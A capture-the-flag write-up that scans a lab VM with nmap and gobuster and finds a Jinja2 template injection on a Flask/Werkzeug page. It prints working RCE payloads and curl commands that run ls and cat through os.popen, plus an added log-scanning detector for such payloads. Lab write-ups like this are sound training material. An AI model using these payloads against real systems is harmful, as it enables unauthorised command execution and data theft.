CTF Challenge Writeup: Flag 1
- This writeup details the process of capturing the first flag in the CTF challenge.
Pre-Enum
- Import the VM image we were given into VirtualBox and start it headless:
vboxmanage import CTF_VB.ova
vboxmanage startvm "CTF 3" --type headless
Initial Enumeration
- Once the VM is running in VirtualBox, find your own address with ip addr and then sweep the subnet for the target. Check this in two passes to avoid confusion: in my case the first pass showed 4 hosts, and on the second pass my VM host was up.
nmap -sn 192.168.1.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-22 20:57 IST
Nmap scan report for 192.168.1.1
Host is up (0.016s latency).
Nmap scan report for 192.168.1.2
Host is up (0.013s latency).
Nmap scan report for LGwebOSTV (192.168.1.3)
Host is up (0.016s latency).
Nmap scan report for 192.168.1.4
Host is up (0.013s latency).
Nmap scan report for 192.168.1.5
Host is up (0.013s latency).
Nmap scan report for parrot (192.168.X.X)
Host is up (0.00014s latency).
Nmap scan report for 192.168.1.7
Host is up (0.00052s latency).
Nmap done: 256 IP addresses (7 hosts up) scanned in 4.79 seconds
nmap -sV -sC 192.168.1.7
This scan revealed:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-22 11:31 IST
Nmap scan report for 192.168.1.7
Host is up (0.00014s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
|   256 e1:c6:00:a6:16:5b:78:82:cd:50:ae:35:57:03:84:41 (ECDSA)
|_  256 42:97:49:52:c9:da:ad:5a:e7:eb:f3:7b:e8:87:06:7f (ED25519)
5000/tcp open  upnp?
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.1.3 Python/3.11.2
|     Date: Mon, 22 Sep 2025 06:01:43 GMT
|     Content-Disposition: inline; filename=index.html
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 3806
|     Last-Modified: Sat, 13 Sep 2025 13:33:51 GMT
|     Cache-Control: no-cache
|     ETag: "1757770431.1740406-3806-3086748594"
|     Date: Mon, 22 Sep 2025 06:01:43 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>R&D Portal</title>
|     <style>
|     body {
|     margin: 0;
|     font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
|     background: #f4f7fb;
|     color: #333;
|     }
|     /* Navbar */
|     .navbar {
|     display: flex;
|     justify-content: space-between;
|     align-items: center;
|     padding: 15px 40px;
|     background: #1e3c72;
|     background: linear-gra
|   RTSPRequest:
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[SF-Port5000-TCP fingerprint block omitted; it is the hex-escaped form of the same HTTP response shown above]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.35 seconds
- Port 22/tcp: OpenSSH 9.2p1
- Port 5000/tcp: a Python web application served by Werkzeug 3.1.3 (Python 3.11.2), according to the Server header.
Web Server Enumeration
- The web server on port 5000 seemed like the most promising attack vector. I started by exploring the web application. The initial page was a simple “R&D Portal” with a non-functional search bar.
- To discover hidden pages, I ran gobuster with the directory-list-2.3-medium.txt wordlist:
gobuster dir -u http://192.168.1.7:5000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
- This scan revealed a hidden directory: /page.
SSTI Vulnerability Discovery
- Navigating to http://192.168.1.7:5000/page revealed a form asking for a name, which was submitted via a GET request to the same page. Input that is reflected straight back into the page like this is a classic place to look for Server-Side Template Injection (SSTI).
- To test for SSTI, I submitted the following payload as the name parameter:
{{7*7}}
- The server responded with “Hello 49!”, confirming the SSTI vulnerability: the template engine evaluated the expression instead of echoing it back.
Remote Code Execution
- Since the server was identified as Python-based, I used a Jinja2 SSTI payload to attempt Remote Code Execution (RCE). I started by listing the files in the current directory with the ls command.
- The payload was:
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read() }}
- This was URL-encoded and sent via curl:
curl "http://192.168.1.7:5000/page?name=%7B%7B%20self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read()%20%7D%7D"
- The response contains the directory listing. The newlines from ls are collapsed when the HTML is rendered, so the three entries app.py, F14@_0n3.txt and static run together:
Hello app.pyF14@_0n3.txtstatic
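From the defender's side, both the {{7*7}} probe and the __globals__/__builtins__ attribute walk used above are visible in the web server's access log. The following is an added example, not part of the original writeup: a stdlib-only Python detector that parses constructed log lines in the default Werkzeug dev-server format, URL-decodes each query parameter and flags template delimiters and dunder walks.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Werkzeug's default access-log line: client - - [time] "METHOD path HTTP/x" status -
LOG_RE = re.compile(
    r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
# {{ ... }} or {% ... %} inside a parameter value is a template expression, not a name.
TEMPLATE_DELIMS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
# Dunder attribute walks are how Jinja2 payloads climb from a string object to the interpreter.
DUNDER_WALK = re.compile(r"__(?:globals|builtins|import|subclasses|mro|class)__")


def classify(value):
    """Return 'sandbox-escape', 'probe' or None for one decoded parameter value."""
    if DUNDER_WALK.search(value):
        return "sandbox-escape"
    if TEMPLATE_DELIMS.search(value):
        return "probe"
    return None


def scan_log(lines):
    """Yield (ip, path, parameter, verdict) for every suspicious query parameter."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("path"))
        # parse_qs percent-decodes once; unquote again so double-encoded %257B is caught too.
        for param, values in parse_qs(url.query, keep_blank_values=True).items():
            for value in values:
                verdict = classify(unquote(value))
                if verdict:
                    yield (m.group("ip"), url.path, param, verdict)


# Constructed sample log lines mirroring the requests made in this writeup.
SAMPLE_LOG = [
    '192.168.1.5 - - [22/Sep/2025 20:58:01] "GET /page?name=alice HTTP/1.1" 200 -',
    '192.168.1.5 - - [22/Sep/2025 20:58:09] "GET /page?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 -',
    '192.168.1.5 - - [22/Sep/2025 20:58:40] "GET /page?name=%7B%7B%20self.__init__.__globals__.__builtins__%20%7D%7D HTTP/1.1" 200 -',
    '192.168.1.5 - - [22/Sep/2025 20:59:02] "GET /static/style.css HTTP/1.1" 304 -',
]

if __name__ == "__main__":
    for ip, path, param, verdict in scan_log(SAMPLE_LOG):
        print("%s %s param %r: %s" % (ip, path, param, verdict))
```

On the sample log the benign request and the static asset produce no hits, while the probe and the attribute walk are reported separately so the second can be prioritised.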
Flag Discovery
- With RCE confirmed, I read the contents of the F14@_0n3.txt file with the cat command.
- The payload was:
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat F14@_0n3.txt').read() }}
- This was URL-encoded and sent via curl:
curl "http://192.168.1.7:5000/page?name=%7B%7B%20self.__init__.__globals__.__builtins__.__import__('os').popen('cat%20F14@_0n3.txt').read()%20%7D%7D"
- The server responded with the flag:
jin@parrot ~/Desktop/indian army curl "http://192.168.1.10:5000/page?name=%7B%7B%20self.__init__.__globals__.__builtins__.__import__('os').popen('cat%20F14@_0n3.txt').read()%20%7D%7D"
Hello FLAG -> S3Cur1ty_Br3@k_P@55ed!%
- Thanks for the CTF! 🚩
- Please keep organizing with better practices.